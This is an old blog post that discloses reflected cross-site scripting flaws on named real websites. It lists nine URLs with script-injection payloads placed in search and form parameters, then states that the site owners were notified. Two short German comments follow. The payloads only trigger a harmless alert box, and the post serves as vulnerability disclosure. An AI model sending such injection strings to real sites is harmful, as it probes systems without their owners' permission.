Cross Site Scripting all over the internet

Friday, March 30. 2007, 14:58
It's terrifying how many sites there are out there with XSS-issues.

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>


Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.

Napster and MPAA still unfixed.

Trackbacks

No Trackbacks

Comments
Display comments as (Linear | Threaded)

Du solltest dich mal mit anständigeren Attack-Vektoren beschäftigen als mit dem Kinderkram. :D

BTW: Die Hintergrundfarbe für die Captchas kannst du deinem Layout auch anpassen im Plugin. ;)
#1 Alex (Link) on 2007-04-29 20:30
Das ist doch das passende für Hackr Hanno:
http://www.cs.washington.edu/education/courses/cse490k/CurrentQtr/projects/project3.html

;)
#2 Alex (Link) on 2007-05-31 13:48

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.